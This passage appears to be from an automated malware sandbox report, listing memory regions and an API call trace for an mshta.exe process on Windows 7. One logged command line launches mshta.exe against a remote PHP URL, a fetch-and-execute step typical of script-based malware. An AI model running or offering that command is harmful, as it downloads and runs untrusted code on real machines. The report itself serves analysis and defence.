filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1352
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1353
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1354
start_va = 0x3340000
end_va = 0x343ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003340000"
filename = ""
Region:
id = 1355
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1356
start_va = 0x7fef3140000
end_va = 0x7fef314dfff
entry_point = 0x7fef3141070
region_type = mapped_file
name = "msimtf.dll"
filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll")
Region:
id = 1359
start_va = 0x2a80000
end_va = 0x2b7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a80000"
filename = ""
Region:
id = 1360
start_va = 0x2be0000
end_va = 0x2beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002be0000"
filename = ""
Region:
id = 1361
start_va = 0x7fef22f0000
end_va = 0x7fef2343fff
entry_point = 0x7fef22f104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 1362
start_va = 0x660000
end_va = 0x660fff
entry_point = 0x660000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 1363
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1364
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1365
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1366
start_va = 0x3230000
end_va = 0x332ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003230000"
filename = ""
Region:
id = 1367
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1368
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
entry_point = 0x7fefd651440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1369
start_va = 0x670000
end_va = 0x670fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 1370
start_va = 0x670000
end_va = 0x670fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 1371
start_va = 0x670000
end_va = 0x670fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 1372
start_va = 0x7fef2350000
end_va = 0x7fef2f06fff
entry_point = 0x7fef2351bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 1373
start_va = 0x670000
end_va = 0x671fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 1374
start_va = 0x3440000
end_va = 0x3832fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003440000"
filename = ""
Region:
id = 1438
start_va = 0x7fef3c70000
end_va = 0x7fef3c7bfff
entry_point = 0x7fef3c7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1439
start_va = 0x7fefaf90000
end_va = 0x7fefaf9afff
entry_point = 0x7fefaf912e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1440
start_va = 0x7fefafa0000
end_va = 0x7fefafb8fff
entry_point = 0x7fefafa177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 1441
start_va = 0x7fefafc0000
end_va = 0x7fefafd4fff
entry_point = 0x7fefafc12a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 1442
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1443
start_va = 0x7fee0420000
end_va = 0x7fee04b9fff
entry_point = 0x7fee042e1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 1444
start_va = 0x7fee52a0000
end_va = 0x7fee52c7fff
entry_point = 0x7fee52a1070
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 1445
start_va = 0x7fef9730000
end_va = 0x7fef9747fff
entry_point = 0x7fef9731010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1446
start_va = 0x7fee06d0000
end_va = 0x7fee0703fff
entry_point = 0x7fee06d1064
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 1447
start_va = 0x680000
end_va = 0x693fff
entry_point = 0x681070
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 1766
start_va = 0x6a0000
end_va = 0x6a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 1767
start_va = 0x6b0000
end_va = 0x6b3fff
entry_point = 0x6b0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1768
start_va = 0x1ed0000
end_va = 0x1eeefff
entry_point = 0x1ed0000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 1769
start_va = 0x1ef0000
end_va = 0x1ef0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ef0000"
filename = ""
Region:
id = 1770
start_va = 0x1f00000
end_va = 0x1f2ffff
entry_point = 0x1f00000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 1771
start_va = 0x1f30000
end_va = 0x1f33fff
entry_point = 0x1f30000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1772
start_va = 0x2cc0000
end_va = 0x2d25fff
entry_point = 0x2cc0000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1773
start_va = 0x3840000
end_va = 0x390ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003840000"
filename = ""
Region:
id = 1774
start_va = 0x3960000
end_va = 0x3a5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003960000"
filename = ""
Region:
id = 1775
start_va = 0x3b20000
end_va = 0x3b9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b20000"
filename = ""
Region:
id = 1776
start_va = 0x3d10000
end_va = 0x3e0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d10000"
filename = ""
Region:
id = 1777
start_va = 0x7fefbc80000
end_va = 0x7fefbcd2fff
entry_point = 0x7fefbc82b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1778
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1779
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1780
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1781
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1782
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1783
start_va = 0x3e10000
end_va = 0x473ffff
entry_point = 0x3e10000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Thread:
id = 75
os_tid = 0x628
[0067.201] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff30 | out: lpSystemTimeAsFileTime=0x20ff30*(dwLowDateTime=0xd8008af0, dwHighDateTime=0x1d34cee))
[0067.201] GetCurrentProcessId () returned 0x370
[0067.201] GetCurrentThreadId () returned 0x628
[0067.201] GetTickCount () returned 0x200da
[0067.201] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff38 | out: lpPerformanceCount=0x20ff38*=493774125) returned 1
[0067.205] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000
[0067.205] GetStartupInfoW (in: lpStartupInfo=0x20fdb0 | out: lpStartupInfo=0x20fdb0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0067.205] GetVersionExW (in: lpVersionInformation=0x20fe20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20fe20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.208] HeapSetInformation (HeapHandle=0x6c0000, HeapInformationClass=0x0, HeapInformation=0x20fd80, HeapInformationLength=0x4) returned 1
[0067.209] HeapSetInformation (HeapHandle=0x6c0000, HeapInformationClass=0x0, HeapInformation=0x20fd80, HeapInformationLength=0x4) returned 1
[0067.210] GetStartupInfoW (in: lpStartupInfo=0x20fcf0 | out: lpStartupInfo=0x20fcf0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xff9d0000, hStdOutput=0xff9d4214, hStdError=0x6c4ba0))
[0067.210] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0067.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
[0067.210] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
[0067.210] SetHandleCount (uNumber=0x20) returned 0x20
[0067.210] GetCommandLineA () returned="\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
[0067.210] GetEnvironmentStringsW () returned 0x257430*
[0067.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1386, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1386
[0067.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1386, lpMultiByteStr=0x6c5590, cbMultiByte=1386, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1386
[0067.210] FreeEnvironmentStringsW (penv=0x257430) returned 1
[0067.210] GetLastError () returned 0x0
[0067.210] SetLastError (dwErrCode=0x0)
[0067.210] GetLastError () returned 0x0
[0067.210] SetLastError (dwErrCode=0x0)
[0067.210] GetLastError () returned 0x0
[0067.210] SetLastError (dwErrCode=0x0)
[0067.210] GetACP () returned 0x4e4
[0067.210] GetLastError () returned 0x0
[0067.210] SetLastError (dwErrCode=0x0)
[0067.210] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20fc80 | out: lpCPInfo=0x20fc80) returned 1
[0067.211] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f720 | out: lpCPInfo=0x20f720) returned 1
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0067.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f740, cbMultiByte=256, lpWideCharStr=0x20f420, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뗿쑚䳮") returned 256
[0067.211] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뗿쑚䳮", cchSrc=256, lpCharType=0x20fa40 | out: lpCharType=0x20fa40) returned 1
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0067.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f740, cbMultiByte=256, lpWideCharStr=0x20f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256
[0067.211] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0067.211] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x20f1b0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256
[0067.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x20f840, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¯\x01", lpUsedDefaultChar=0x0) returned 256
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0067.211] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f740, cbMultiByte=256, lpWideCharStr=0x20f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256
[0067.211] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0067.211] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x20f1b0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256
[0067.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x20f940, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84
